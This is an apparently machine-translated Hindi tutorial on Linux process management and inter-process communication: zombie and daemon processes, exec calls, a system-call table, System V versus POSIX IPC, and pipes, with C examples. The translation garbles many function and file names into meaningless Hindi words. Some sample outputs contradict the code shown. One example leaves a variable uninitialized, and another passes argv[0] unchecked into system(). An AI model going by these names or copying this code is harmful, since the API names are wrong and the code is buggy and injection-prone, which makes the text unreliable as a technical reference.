UID         PID   PPID  C STIME TTY    TIME CMD
4581875  180567      0  0 09:19  ?     00:00:00 main
4581875  180820 180567  0 09:19  ?     00:00:00 ps -f
Child: pid is 180567 and ppid is 180565
Child: pid is 180567 and ppid is 0

ज़ोंबी प्रक्रिया

सरल शब्दों में, मान लें कि आपके पास दो प्रक्रियाएँ हैं, अर्थात् माता-पिता और बच्चे की प्रक्रिया। बाल प्रक्रिया के लिए प्रतीक्षा करना और फिर प्रक्रिया तालिका से बाल प्रक्रिया प्रविष्टि को साफ करना माता-पिता की प्रक्रिया की जिम्मेदारी है। क्या होगा यदि अभिभावक प्रक्रिया बच्चे की प्रक्रिया के लिए इंतजार करने के लिए तैयार नहीं है, और इस बीच बच्चे की प्रक्रिया अपना काम पूरा कर लेती है और बाहर निकल जाती है? अब, बच्चे की प्रक्रिया ज़ोंबी प्रक्रिया बन जाएगी। बेशक, मूल प्रक्रिया तैयार होने के बाद ज़ोंबी प्रक्रिया को साफ किया जाता है।

इसे एक उदाहरण की मदद से समझते हैं।

/ * फ़ाइल का नाम: zombie_process.c * /

#include<stdio.h>
#include<stdlib.h>

int main() {
   int pid;
   pid = fork();
   if (pid == 0) {
      system("ps -f");
      printf("Child: pid is %d and ppid is %d\n",getpid(),getppid());
      exit(0);
   } else {
      printf("Parent: pid is %d and ppid is %d\n",getpid(),getppid());
      sleep(10);
      system("ps aux|grep Z");
   }
   return 0;
}

संकलन और निष्पादन कदम

UID         PID   PPID  C STIME TTY    TIME CMD
4581875  184946      0  0 09:20  ?     00:00:00 sh -c cd /home/cg/root/4581875; 
                                       timeout 10s main
4581875  184952 184946  0 09:20  ?     00:00:00 timeout 10s main
4581875  184953 184952  0 09:20  ?     00:00:00 main
4581875  184954 184953  0 09:20  ?     00:00:00 main
4581875  184955 184954  0 09:20  ?     00:00:00 ps -f
Child: pid is 184954 and ppid is 184953

डेमन प्रक्रिया

सरल शब्दों में, जिस प्रक्रिया में कोई संबद्ध शेल या टर्मिनल नहीं है, उसे डेमन प्रक्रिया के रूप में जाना जाता है। इसकी आवश्यकता क्यों है? ये ऐसी प्रक्रियाएं हैं जो पूर्वनिर्धारित अंतराल पर कार्रवाई करने के लिए पृष्ठभूमि में चलती हैं और कुछ घटनाओं का जवाब भी देती हैं। डेमन प्रक्रिया में कोई उपयोगकर्ता सहभागिता नहीं होनी चाहिए, क्योंकि यह एक पृष्ठभूमि प्रक्रिया के रूप में चलती है।

आंतरिक लिनक्स डेमॉन प्रक्रियाएं आमतौर पर अक्षर "d" से समाप्त होती हैं जैसे कि कर्नेल डेमन्स (ksoftirqd, kblockd, kswapd, इत्यादि), मुद्रण Daemons (cupd, lpd, आदि), फ़ाइल सेवा Daemons (smbd, nmbd, आदि)। , प्रशासनिक डेटाबेस डेमन (ypbind, ypserv, आदि), इलेक्ट्रॉनिक मेल डेमन (सेंडमेल, पॉपड, smtpd, इत्यादि), रिमोट लॉगिन और कमांड एक्ज़ीक्यूशन डेमन्स (sshd, in.tnetnetd, आदि), बूटिंग और कॉन्फ़िगरेशन डेमॉन (dhcpd)। , udvd, आदि), init प्रक्रिया (init), क्रोन डेमॉन, ए टी डी डेमन, आदि।

अब देखते हैं कि डेमॉन प्रक्रिया कैसे बनाते हैं। निम्नलिखित चरण हैं -

Step 1- एक बच्चे की प्रक्रिया बनाएँ। अब हमारे पास दो प्रक्रियाएं हैं - मूल प्रक्रिया और बच्चे की प्रक्रिया

आमतौर पर प्रक्रिया पदानुक्रम शेल → पैरेन्ट प्रक्रिया → शिशु प्रक्रिया है

Step 2- बाहर निकलने से मूल प्रक्रिया को समाप्त करें। बाल प्रक्रिया अब अनाथ प्रक्रिया बन जाती है और इनिट प्रक्रिया द्वारा इसे संभाल लिया जाता है।

अब, पदानुक्रम INIT PROCESS → CHILD PROCESS है

Step 3- सेटिडस () सिस्टम कॉल को कॉल करना एक नया सत्र बनाता है, यदि कॉलिंग प्रक्रिया एक प्रक्रिया समूह नेता नहीं है। अब कॉलिंग प्रक्रिया नए सत्र के समूह नेता बन जाती है। यह प्रक्रिया इस नए प्रक्रिया समूह और इस नए सत्र में एकमात्र प्रक्रिया होगी।

Step 4 - कॉलिंग प्रक्रिया के पीआईडी ​​के लिए प्रक्रिया समूह आईडी और सत्र आईडी सेट करें।

Step 5 - टर्मिनल और शेल के रूप में प्रक्रिया के डिफ़ॉल्ट फ़ाइल डिस्क्रिप्टर (मानक इनपुट, मानक आउटपुट और मानक त्रुटि) को बंद करें, अब एप्लिकेशन से डिस्कनेक्ट हो गया है।

/ * फ़ाइल नाम: daemon_test.c * /

#include<stdio.h>
#include<sys/types.h>
#include<sys/stat.h>
#include<unistd.h>
#include<fcntl.h>
#include<stdlib.h>
#include<string.h>

int main(int argc, char *argv[]) {
   pid_t pid;
   int counter;
   int fd;
   int max_iterations;
   char buffer[100];
   if (argc < 2)
   max_iterations = 5;
   else {
      max_iterations = atoi(argv[1]);
      if ( (max_iterations <= 0) || (max_iterations > 20) )
      max_iterations = 10;
   }
   pid = fork();
   
   // Unable to create child process
   if (pid < 0) {
      perror("fork error\n");
      exit(1);
   }
   
   // Child process
   if (pid == 0) {
      fd = open("/tmp/DAEMON.txt", O_WRONLY|O_CREAT|O_TRUNC, 0644);
      if (fd == -1) {
         perror("daemon txt file open error\n");
         return 1;
      }
      printf("Child: pid is %d and ppid is %d\n", getpid(), getppid());
      printf("\nChild process before becoming session leader\n");
      sprintf(buffer, "ps -ef|grep %s", argv[0]);
      system(buffer);
      setsid();
      printf("\nChild process after becoming session leader\n");
      sprintf(buffer, "ps -ef|grep %s", argv[0]);
      system(buffer);
      close(STDIN_FILENO);
      close(STDOUT_FILENO);
      close(STDERR_FILENO);
   } else {
      printf("Parent: pid is %d and ppid is %d\n", getpid(), getppid());
      printf("Parent: Exiting\n");
      exit(0);
   }
   
   // Executing max_iteration times
   for (counter = 0; counter < max_iterations; counter++) {
      sprintf(buffer, "Daemon process: pid is %d and ppid is %d\n", getpid(), getppid());
      write(fd, buffer, strlen(buffer));
      sleep(2);
   }
   strcpy(buffer, "Done\n");
   write(fd, buffer, strlen(buffer));
   
   // Can't print this as file descriptors are already closed
   printf("DoneDone\n");
   close(fd);
   return 0;
}

Parent: pid is 193524 and ppid is 193523
Parent: Exiting
4581875  193525      0  0 09:23  ?      00:00:00 main
4581875  193526 193525  0 09:23  ?      00:00:00 sh -c ps -ef|grep main
4581875  193528 193526  0 09:23  ?      00:00:00 grep main
4581875  193525      0  0 09:23  ?      00:00:00 main
4581875  193529 193525  0 09:23  ?      00:00:00 sh -c ps -ef|grep main
4581875  193531 193529  0 09:23  ?      00:00:00 grep main

मान लें कि हम एक कार्यक्रम चला रहे हैं और हम वर्तमान कार्यक्रम से एक और कार्यक्रम चलाना चाहते हैं। क्या यह संभव है? क्यों नहीं, अगर हम प्रक्रिया छवि को ओवरले करने की अवधारणा को लागू करते हैं। यह ठीक है लेकिन वर्तमान में चल रहे कार्यक्रम के बारे में क्या कहा जा सकता है। यह कैसे संभव है, क्योंकि हम नए कार्यक्रम के साथ वर्तमान कार्यक्रम को समाप्त कर देते हैं। मुझे क्या करना चाहिए, अगर मैं वर्तमान में चल रहे कार्यक्रम को खोए बिना दो कार्यक्रम चलाना चाहता हूं, क्या यह संभव है? हाँ यह संभव है।

एक बच्चे की प्रक्रिया बनाएं, ताकि हमारे पास माता-पिता की प्रक्रिया और एक नई बनाई गई बच्चे की प्रक्रिया हो। पहले से ही हम मूल कार्यक्रम में वर्तमान कार्यक्रम चला रहे हैं, इसलिए बच्चे में नई बनाई गई प्रक्रिया को चलाएं। इस तरह, हम वर्तमान कार्यक्रम से एक और कार्यक्रम चला सकते हैं। केवल एक कार्यक्रम ही नहीं, बल्कि हम वर्तमान कार्यक्रम से किसी भी संख्या में कई बाल प्रक्रियाएँ बनाकर चला सकते हैं।

आइए हम निम्नलिखित कार्यक्रम को एक उदाहरण के रूप में मानते हैं।

/ * फ़ाइल नाम: helloworld.c * /

#include<stdio.h>

void main() {
   printf("Hello World\n");
   return;
}

/ * फ़ाइल का नाम: execl_test.c * /

#include<stdio.h>
#include<unistd.h>

void main() {
   execl("./helloworld", "./helloworld", (char *)0);
   printf("This wouldn't print\n");
   return;
}

उपर्युक्त कार्यक्रम हेल्लोवर्थ के साथ एक्ज़्लॉट_टेस्ट की प्रक्रिया छवि को ओवरले करेगा। यही कारण है कि, execl_test (printf ()) की प्रक्रिया छवि कोड निष्पादित नहीं है।

संकलन और निष्पादन कदम

Hello World

अब, हम एक प्रोग्राम से दो प्रोग्राम चलाएंगे, यानी, execl_run_two_prgms.c।

  • हैलो वर्ल्ड प्रोग्राम (helloworld.c)

  • जबकि लूप प्रोग्राम 1 से 10 तक प्रिंट होता है (जबकि__लोप। C।)

/ * फ़ाइल नाम: जबकि_loop.c * /

/* Prints numbers from 1 to 10 using while loop */
#include<stdio.h>

void main() {
   int value = 1;
   while (value <= 10) {
      printf("%d\t", value);
      value++;
   }
   printf("\n");
   return;
}

निम्नलिखित दो कार्यक्रम चलाने का कार्यक्रम है (बच्चे से एक कार्यक्रम और माता-पिता से एक अन्य कार्यक्रम)।

/ * फ़ाइल नाम: execl_run_two_prgms.c * /

#include<stdio.h>
#include<unistd.h>

void main() {
   int pid;
   pid = fork();
   
   /* Child process */
   if (pid == 0) {
      printf("Child process: Running Hello World Program\n");
      execl("./helloworld", "./helloworld", (char *)0);
      printf("This wouldn't print\n");
   } else { /* Parent process */
      sleep(3);
      printf("Parent process: Running While loop Program\n");
      execl("./while_loop", "./while_loop", (char *)0);
      printf("Won't reach here\n");
   }
   return;
}

Note - सुनिश्चित करें कि बच्चे और माता-पिता की प्रक्रिया क्रमिक रूप से चले (परिणाम ओवरलैप न करें) करने के लिए नींद () कॉल करें।

संकलन और निष्पादन कदम

Child process: Running Hello World Program
This wouldn't print
Parent process: Running While loop Program
Won't reach here

अब हम एक प्रोग्राम से दो प्रोग्राम चलाएंगे, जैसे कि execl_run_two_prgms.c, उपरोक्त प्रोग्राम, लेकिन कमांड लाइन आर्ग्युमेंट्स के साथ। इसलिए, हम चाइल्ड प्रोसेस में क्रमशः helloworld.c, और पेरेंट प्रोसेस में__लोप.है, जबकि दो प्रोग्राम चला रहे हैं। यह इस प्रकार है -

  • हैलो वर्ल्ड प्रोग्राम (helloworld.c)

  • जबकि लूप प्रोग्राम 1 से प्रिंट करने के लिए num_times_str कमांड लाइन तर्क के अनुसार (जबकि_loop.c)

यह कार्यक्रम मोटे तौर पर निम्नलिखित क्रियाएं करता है -

  • बाल प्रक्रिया बनाता है

  • चाइल्ड प्रोसेस helloworld.c प्रोग्राम को निष्पादित करता है

  • पैरेंट प्रक्रिया, प्रोग्राम के तर्क के रूप में कमांड लाइन लॉजिक मान को पास करते हुए_loop.c प्रोग्राम निष्पादित करती है। यदि कमांड लाइन तर्क पारित नहीं किया जाता है, तो डिफ़ॉल्ट को 10. के रूप में लिया जाता है, अन्यथा, यह दिए गए तर्क मान लेता है। तर्क मूल्य संख्यात्मक होना चाहिए; यदि अक्षर में दिया गया है तो कोड मान्य नहीं होगा।

/ * फ़ाइल नाम: execl_run_two_prgms.c * /

#include<stdio.h>
#include<string.h>
#include<unistd.h>

void main(int argc, char *argv[0]) {
   int pid;
   int err;
   int num_times;
   char num_times_str[5];
   
   /* In no command line arguments are passed, then loop maximum count taken as 10 */
   if (argc == 1) {
      printf("Taken loop maximum as 10\n");
      num_times = 10;
      sprintf(num_times_str, "%d", num_times);
   } else {
      strcpy(num_times_str, argv[1]);
      printf("num_times_str is %s\n", num_times_str);
      pid = fork();
   }
   
   /* Child process */
   if (pid == 0) {
      printf("Child process: Running Hello World Program\n");
      err = execl("./helloworld", "./helloworld", (char *)0);
      printf("Error %d\n", err);
      perror("Execl error: ");
      printf("This wouldn't print\n");
   } else { /* Parent process */
      sleep(3);
      printf("Parent process: Running While loop Program\n");
      execl("./while_loop", "./while_loop", (char *)num_times_str, (char *)0);
      printf("Won't reach here\n");
   }
   return;
}

इस कार्यक्रम की बाल प्रक्रिया से पुकारे जाने वाले हेलोवर्ल्ड.सी कार्यक्रम का अनुसरण किया जा रहा है, execl_run_two_prgms.c।

/ * फ़ाइल नाम: helloworld.c * /

#include<stdio.h>

void main() {
   printf("Hello World\n");
   return;
}

इस कार्यक्रम की मूल प्रक्रिया से पुछे जाने के दौरान __opop.c का प्रोग्राम है, execl_run_two_prgms.c। इस प्रोग्राम का तर्क उस प्रोग्राम से पास किया जाता है जो इसे चलाता है, यानी, execl_run_two_prgms.c।

/ * फ़ाइल का नाम: जबकि_loop.c * /

#include<stdio.h>

void main(int argc, char *argv[]) {
   int start_value = 1;
   int end_value;
   if (argc == 1)
   end_value = 10;
   else
   end_value = atoi(argv[1]);
   printf("Argv[1] is %s\n", argv[1]);
   while (start_value <= end_value) {
      printf("%d\t", start_value);
      start_value++;
   }
   printf("\n");
   return;
}

संकलन और निष्पादन कदम

Taken loop maximum as 10
num_times_str is 10
Child process: Running Hello World Program
Hello World
Parent process: Running While loop Program
Argv[1] is 10
1 2 3 4 5 6 7 8 9 10
Taken loop maximum as 15
num_times_str is 15
Child process: Running Hello World Program
Hello World
Parent process: Running While loop Program
Argv[1] is 15
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

आइए अब ओवरलेइंग इमेज संबंधित लाइब्रेरी फ़ंक्शंस देखें।

#include<unistd.h>

int execl(const char *path, const char *arg, ...);

यह फ़ंक्शन तर्कों, पथ और आर्ग में उल्लिखित नई प्रक्रिया के साथ वर्तमान चल रही प्रक्रिया छवि को ओवरले करेगा। यदि किसी तर्क को एक नई प्रक्रिया छवि को पारित करने की आवश्यकता होती है, तो उसे "arg" तर्कों के माध्यम से भेजा जाएगा और अंतिम तर्क NULL होना चाहिए।

यह फ़ंक्शन त्रुटि के मामले में केवल एक मान लौटाएगा। छवि संबंधी कॉल ओवरले करने की प्रक्रिया नीचे बताई गई है -

int execl(const char *path, const char *arg, ...);
int execlp(const char *file, const char *arg, ...);
int execle(const char *path, const char *arg, ..., char * const envp[]);
int execv(const char *path, char *const argv[]);
int execvp(const char *file, char *const argv[]);
int execvpe(const char *file, char *const argv[], char *const envp[]);

ये कॉल पासिंग कमांड लाइन तर्क (argv []], पर्यावरण चर (envp []) और अन्य मापदंडों को संबोधित करेंगे।

निम्नलिखित तालिका उनके विवरण के साथ विभिन्न सिस्टम कॉल को सूचीबद्ध करती है।

वर्ग सिस्टम कॉल विवरण
आम खुला हुआ () यह सिस्टम कॉल या तो पहले से मौजूद फ़ाइल को खोलता है या एक नई फ़ाइल बनाता है और खोलता है।
आम जीव () बनाता है और एक नई फ़ाइल खोलता है।
आम पढ़ें () आवश्यक बफर में फ़ाइल की सामग्री को पढ़ता है।
आम लिखो () फ़ाइल में बफर की सामग्री को लिखता है।
आम बंद करे () फ़ाइल डिस्क्रिप्टर को बंद कर देता है।
आम स्टेट () फ़ाइल पर जानकारी प्रदान करता है।
पाइप्स पाइप () संचार के लिए पाइप बनाता है जो पढ़ने और लिखने के लिए दो फ़ाइल विवरण देता है।
नामित पाइप या फिफो मकनोद () FIFOs बनाने के लिए मेमोरी डिवाइस फ़ाइल या विशेष फ़ाइल बनाता है
नामित पाइप या फिफो mkfifo () एक नया FIFO बनाता है
शेयर्ड मेमोरी Shmget () एक नया साझा मेमोरी सेगमेंट बनाता है या मौजूदा सेगमेंट की पहचान करता है।
शेयर्ड मेमोरी शमत () साझा मेमोरी सेगमेंट को शामिल करता है और सेगमेंट को कॉलिंग प्रक्रिया की आभासी मेमोरी का हिस्सा बनाता है।
शेयर्ड मेमोरी shmdt () साझा मेमोरी सेगमेंट को अलग करता है।
शेयर्ड मेमोरी shmctl () साझा मेमोरी के लिए नियंत्रण संचालन करता है। साझा मेमोरी के लिए सामान्य नियंत्रण संचालन के कुछ साझा मेमोरी सेगमेंट (IPC_RMID) को हटा रहे हैं, साझा मेमोरी (IPC_STAT) की जानकारी प्राप्त कर रहे हैं और मौजूदा साझा मेमोरी (IPC_SET) के नए मूल्यों को अपडेट कर रहे हैं।
संदेश कतार संदेश () एक नई संदेश कतार बनाता है या पहले से मौजूद संदेश कतार तक पहुँचता है और संदेश कतार के बारे में कार्रवाई करने के लिए हैंडल या पहचानकर्ता प्राप्त करता है, जैसे संदेश भेजने / कतार में भेजने और कतार से संदेश / संदेश प्राप्त करने के लिए।
संदेश कतार संदेश () आवश्यक पहचान संख्या के साथ आवश्यक संदेश कतार में एक संदेश भेजता है।
संदेश कतार msgrcv () संदेश कतार से संदेश प्राप्त करता है। डिफ़ॉल्ट रूप से, यह अनंत प्रतीक्षा ऑपरेशन है, इसका मतलब है कि कॉल तब तक अवरुद्ध रहेगी जब तक यह एक संदेश प्राप्त नहीं करता है।
संदेश कतार msgctl () संदेश कतार के लिए नियंत्रण संचालन करता है। संदेश कतार के लिए सामान्य नियंत्रण संचालन के कुछ संदेश कतार (IPC_RMID) को हटा रहे हैं, संदेश कतार (IPC_STAT) की जानकारी प्राप्त कर रहे हैं और मौजूदा संदेश कतार (IPC_SET) के नए मूल्यों को अपडेट कर रहे हैं।
सेमाफोर संगोष्ठी () एक नया सेमीफोर बनाता है या मौजूदा सेमाफोर की पहचान करता है। एक ही वस्तु पर काम करने वाले विभिन्न आईपीसी के बीच सिंक्रनाइज़ेशन करने के लिए सेमाफोर का उपयोग किया जाता है।
सेमाफोर सेमोप () सेमाफोर मानों पर सेमाफोर संचालन करता है। मूल सेमाफोर संचालन या तो प्राप्त कर रहे हैं या फिर सेमाफोर पर ताला जारी कर रहे हैं।
सेमाफोर अर्धविराम () सेमाफोर के लिए नियंत्रण संचालन करता है। सेमाफ़ोर के लिए सामान्य नियंत्रण संचालन के कुछ सेमाफ़ोर (IPC_RMID) को हटा रहा है, जो सेमाफ़ोर (IPC_STAT) की जानकारी प्राप्त कर रहा है और मौजूदा सेमाफ़ोर (IPC_SET) के नए मूल्यों को अपडेट कर रहा है।
सिग्नल संकेत () सिग्नल (सिग्नल नंबर) और सिग्नल हैंडलर का फैलाव सेट करना। अन्य शब्दों में, दिनचर्या को पंजीकृत करना, जो उस संकेत को उठाए जाने पर निष्पादित हो जाता है।
सिग्नल सिगनेशन () संकेत के रूप में भी (), संकेत के स्वभाव की स्थापना, अर्थात, पंजीकृत सिग्नल की प्राप्ति के बाद पंजीकृत सिग्नल हैंडलर के अनुसार कुछ कार्रवाई करना। यह सिस्टम कॉल सिग्नल पर बेहतर नियंत्रण का समर्थन करता है () जैसे कि कुछ सिग्नलों को अवरुद्ध करना, सिग्नल हैंडलर को कॉल करने के बाद डिफ़ॉल्ट स्थिति में सिग्नल की कार्रवाई को बहाल करना, उपयोगकर्ता की खपत के समय और सिस्टम, प्रक्रिया भेजने की प्रक्रिया आईडी आदि जैसी जानकारी प्रदान करना।
मेमोरी मैपिंग मिमीप () मेमोरी में फाइलों को मैप करना। एक बार मेमोरी में मैप करने के बाद, फ़ाइलों को एक्सेस करना उतना ही आसान है जितना कि एड्रेस का इस्तेमाल करके डेटा एक्सेस करना और इस तरह से, सिस्टम कॉल के लिए कॉल महंगा नहीं है।
मेमोरी मैपिंग मूनमैप () स्मृति से मैप की गई फ़ाइलों को अन-मैप करना।

निम्न तालिका सिस्टम V IPC और POSIX IPC के बीच के अंतरों को सूचीबद्ध करती है।

सिस्टम वी POSIX
एटी एंड टी ने (1983) आईपीसी सुविधाओं के तीन नए रूप पेश किए, जैसे संदेश कतार, साझा मेमोरी और सेमाफोर। अनुप्रयोग प्रोग्रामिंग इंटरफ़ेस (एपीआई) को परिभाषित करने के लिए IEEE द्वारा निर्दिष्ट पोर्टेबल ऑपरेटिंग सिस्टम इंटरफ़ेस मानक। POSIX IPC के तीनों रूपों को कवर करता है
सिस्टम V IPC सभी IPC तंत्रों को कवर करता है। पाइप, नामित पाइप, संदेश कतार, सिग्नल, सेमीफ़ोर्स और साझा की गई मेमोरी। इसमें सॉकेट और यूनिक्स डोमेन सॉकेट भी शामिल हैं। लगभग सभी बुनियादी अवधारणाएं सिस्टम वी के समान हैं। यह केवल इंटरफ़ेस के साथ भिन्न होती है
साझा मेमोरी इंटरफ़ेस कॉल shmget (), shmat (), shmdt (), shmctl () साझा मेमोरी इंटरफ़ेस कॉल shm_open (), mmap (), shm_unlink ()
संदेश पंक्ति इंटरफ़ेस संदेश संदेश (), msgsnd (), msgrcv (), msgctl () संदेश कतार इंटरफ़ेस कॉल mq_open (), mq_send (), mq_receive (), mq_unlink ()
सेमाफोर इंटरफेस कॉलगर्ल (), सेमी (), सेमीकटल () सेमाफ़ोर इंटरफ़ेस कॉल नामांकित सेमाफ़ोरस sem_open (), sem_close (), sem_unlink (), sem_post (), sem_wait (), sem_trywait (), sem_timedwait (), sem_getvalue () या स्मृति आधारित semaphores sem_init () (semit)। (), sem_getvalue (), sem_destroy ()
IPC ऑब्जेक्ट्स की पहचान करने के लिए कुंजियों और पहचानकर्ताओं का उपयोग करता है। IPC ऑब्जेक्ट्स की पहचान करने के लिए नाम और फ़ाइल डिस्क्रिप्टर का उपयोग करता है
ना POSIX संदेश कतारों का चयन (), पोल () और एपोल एपीआई का उपयोग करके निगरानी की जा सकती है
Msgctl () कॉल प्रदान करता है फ़ंक्शन (mq_getattr () और mq_setattr ()) एक्सेस करने या सेट करने के लिए या तो विशेषताएँ 11. IPC - सिस्टम V & POSIX प्रदान करता है
ना बहु-धागा सुरक्षित। थ्रेड सिंक्रोनाइज़ेशन फ़ंक्शन जैसे कि म्यूटेक्स लॉक, सशर्त चर, रीड-राइट लॉक आदि।
ना संदेश कतारों के लिए कुछ सूचनाएँ प्रदान करता है (जैसे mq_notify ())
स्थिति / नियंत्रण कार्य करने के लिए सिस्टम कॉल जैसे shmctl (), कमांड्स (ipcs, ipcrm) की आवश्यकता होती है। साझा मेमोरी ऑब्जेक्ट को सिस्टम कॉल जैसे fstat (), fchmod () का उपयोग करके जांच और हेरफेर किया जा सकता है
सिस्टम V साझा मेमोरी सेगमेंट का आकार निर्माण के समय (shmget के माध्यम से) तय होता है () हम अंतर्निहित ऑब्जेक्ट के आकार को समायोजित करने के लिए ftruncate () का उपयोग कर सकते हैं, और फिर munmap () और mmap () (या लिनक्स-विशिष्ट mremap ()) का उपयोग करके मैपिंग को फिर से बना सकते हैं

पाइप दो या अधिक संबंधित या परस्पर संबंधित प्रक्रियाओं के बीच एक संचार माध्यम है। यह या तो एक प्रक्रिया के भीतर हो सकता है या बच्चे और माता-पिता की प्रक्रियाओं के बीच एक संचार हो सकता है। संचार भी बहु-स्तरीय हो सकता है जैसे कि माता-पिता, बच्चे और भव्य-बच्चे के बीच संचार, आदि संचार एक पाइप में लिखने और अन्य पाइप से पढ़ने की प्रक्रिया द्वारा प्राप्त किया जाता है। पाइप सिस्टम कॉल को प्राप्त करने के लिए, दो फाइलें बनाएं, एक फाइल में लिखने के लिए और दूसरी फाइल से पढ़ने के लिए।

पाइप तंत्र को वास्तविक समय के परिदृश्य के साथ देखा जा सकता है जैसे कि कुछ कंटेनर में पाइप से पानी भरना, एक बाल्टी कहना और कोई इसे प्राप्त करना, मग के साथ कहना। भरने की प्रक्रिया कुछ भी नहीं है, लेकिन पाइप में लिखना और रीडिंग प्रक्रिया पाइप से पुनर्प्राप्त करने के अलावा कुछ भी नहीं है। इसका तात्पर्य है कि एक आउटपुट (पानी) दूसरे (बाल्टी) के लिए इनपुट है।

#include<unistd.h>

int pipe(int pipedes[2]);

यह सिस्टम कॉल वन-वे संचार के लिए एक पाइप का निर्माण करेगा। यह दो डिस्क्रिप्टर बनाता है, पहला पाइप से पढ़ने के लिए जुड़ा होता है और दूसरा पाइप में लिखने के लिए जुड़ा होता है।

Descriptor pipedes [0] पढ़ने के लिए है और pipedes [1] लिखने के लिए है। पाइपेड्स में जो कुछ भी लिखा गया है [1] पाइपडेस से पढ़ा जा सकता है [को ०]।

यह कॉल सफलता पर शून्य और -1 विफलता के मामले में वापस आ जाएगी। विफलता के कारण को जानने के लिए, गलत चर या गड़बड़ी () फ़ंक्शन के साथ जांचें।

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int open(const char *pathname, int flags);
int open(const char *pathname, int flags, mode_t mode);

भले ही फ़ाइल के लिए मूल संचालन पढ़े और लिखे गए हों, फिर भी आवश्यक कार्य पूरा होने के बाद कार्रवाई करने से पहले फ़ाइल को खोलना और फ़ाइल को बंद करना आवश्यक है। आमतौर पर, डिफ़ॉल्ट रूप से, प्रत्येक प्रक्रिया के लिए 3 डिस्क्रिप्टर खोले जाते हैं, जिनका उपयोग इनपुट (स्टैण्डर्ड इनपुट - स्टडिन), आउटपुट (स्टैंडर्ड आउटपुट - स्टडआउट) और एरर (स्टैण्डर्ड एरर - स्टैडर) के लिए किया जाता है, जिसमें क्रमशः फाइल डिस्क्रिप्टर 0, 1 और 2 होते हैं।

यह सिस्टम कॉल रीड / राइट / सीक (लेसेक) के आगे के फ़ाइल संचालन के लिए उपयोग किए गए फ़ाइल डिस्क्रिप्टर को लौटा देगा। आमतौर पर फाइल डिस्क्रिप्टर 3 से शुरू होते हैं और एक संख्या बढ़ जाती है जैसे कि फाइलों की संख्या खुलती है।

सिस्टम कॉल को खोलने के लिए दी गई दलीलें pathname (सापेक्ष या निरपेक्ष पथ) हैं, झंडे फ़ाइल खोलने के उद्देश्य का उल्लेख करते हैं (कहते हैं, पढ़ने के लिए खोलना, O_RDONLY, लिखना, O_WRONLY, पढ़ना और लिखना, O_DWR, मौजूदा फ़ाइल में संलग्न करना O_APPEND, फ़ाइल बनाने के लिए, यदि O_CREAT वगैरह मौजूद नहीं है) और उपयोगकर्ता या मालिक / समूह / अन्य के लिए पढ़ने / लिखने / निष्पादित करने की अनुमति प्रदान करने वाला आवश्यक मोड। प्रतीकों के साथ मोड का उल्लेख किया जा सकता है।

पढ़ें - 4, लिखें - 2 और निष्पादन - 1।

उदाहरण के लिए: ऑक्टल मान (0 से शुरू होता है), 0764 का अर्थ है कि मालिक ने अनुमतियों को पढ़ा, लिखा और निष्पादित किया है, समूह ने अनुमतियों को पढ़ा और लिखा है, अन्य ने अनुमतियों को पढ़ा है। इसे S_IRWXU के रूप में भी दर्शाया जा सकता है S_IRGRP | S_IWGRP | S_IROTH, जिसका तात्पर्य 0700 | 0040 | 0020 | 0004 → 0764 से है।

यह सिस्टम कॉल, सफलता पर, त्रुटि के मामले में नई फ़ाइल विवरणक आईडी और -1 लौटाता है। त्रुटि के कारण की पहचान त्रुटिपूर्ण चर या गड़बड़ी () फ़ंक्शन से की जा सकती है।

#include<unistd.h>

int close(int fd)

उपरोक्त सिस्टम कॉल समापन पहले से ही फ़ाइल डिस्क्रिप्टर खोला गया। इसका मतलब है कि फ़ाइल अब उपयोग में नहीं है और इससे जुड़े संसाधन किसी अन्य प्रक्रिया द्वारा पुन: उपयोग किए जा सकते हैं। यह सिस्टम कॉल सफलता पर शून्य और त्रुटि के मामले में -1 है। त्रुटि के कारण की पहचान त्रुटिपूर्ण चर या गड़बड़ी () फ़ंक्शन से की जा सकती है।

#include<unistd.h>

ssize_t read(int fd, void *buf, size_t count)

उपरोक्त सिस्टम कॉल फ़ाइल डिस्क्रिप्टर fd के तर्कों के साथ निर्दिष्ट फ़ाइल से पढ़ने के लिए है, आवंटित मेमोरी (या तो स्थिर या गतिशील) और बफर के आकार के साथ उचित बफर।

फाइल डिस्क्रिप्टर आईडी संबंधित फाइल की पहचान करने के लिए है, जिसे ओपन () या पाइप () सिस्टम कॉल के बाद वापस किया जाता है। फ़ाइल को फ़ाइल से पढ़ने से पहले खोला जाना चाहिए। यह स्वचालित रूप से कॉलिंग पाइप () सिस्टम कॉल के मामले में खुलता है।

यह कॉल सफलता पर बाइट्स की संख्या (या फ़ाइल के अंत में मुठभेड़ के मामले में शून्य) और विफलता के मामले में -1 लौटाएगा। वापसी बाइट्स अनुरोधित बाइट्स की संख्या से छोटा हो सकता है, बस अगर कोई डेटा उपलब्ध नहीं है या फ़ाइल बंद है। विफलता के मामले में उचित त्रुटि संख्या निर्धारित है।

विफलता के कारण को जानने के लिए, गलत चर या गड़बड़ी () फ़ंक्शन के साथ जांचें।

#include<unistd.h>

ssize_t write(int fd, void *buf, size_t count)

उपरोक्त सिस्टम कॉल फ़ाइल डिस्क्रिप्टर fd के तर्कों के साथ निर्दिष्ट फ़ाइल को लिखने के लिए है, आवंटित मेमोरी (या तो स्थिर या गतिशील) और बफर के आकार के साथ एक उचित बफर।

फाइल डिस्क्रिप्टर आईडी संबंधित फाइल की पहचान करने के लिए है, जिसे ओपन () या पाइप () सिस्टम कॉल के बाद वापस किया जाता है।

फ़ाइल को फ़ाइल में लिखने से पहले खोला जाना चाहिए। यह स्वचालित रूप से कॉलिंग पाइप () सिस्टम कॉल के मामले में खुलता है।

यह कॉल सफलता पर बाइट्स की संख्या (या शून्य कुछ भी नहीं लिखे जाने पर) और -1 को विफलता के मामले में लौटा देगी। विफलता के मामले में उचित त्रुटि संख्या निर्धारित है।

विफलता के कारण को जानने के लिए, गलत चर या गड़बड़ी () फ़ंक्शन के साथ जांचें।

उदाहरण कार्यक्रम

निम्नलिखित कुछ उदाहरण कार्यक्रम हैं।

Example program 1 - पाइप का उपयोग करके दो संदेश लिखने और पढ़ने का कार्यक्रम।

कलन विधि

Step 1 - एक पाइप बनाएं।

Step 2 - पाइप को एक संदेश भेजें।

Step 3 - पाइप से संदेश को पुनः प्राप्त करें और इसे मानक आउटपुट पर लिखें।

Step 4 - पाइप को एक और संदेश भेजें।

Step 5 - पाइप से संदेश को पुनः प्राप्त करें और इसे मानक आउटपुट पर लिखें।

Note - सभी मैसेज भेजने के बाद रिट्रीटिंग मैसेज भी किए जा सकते हैं।

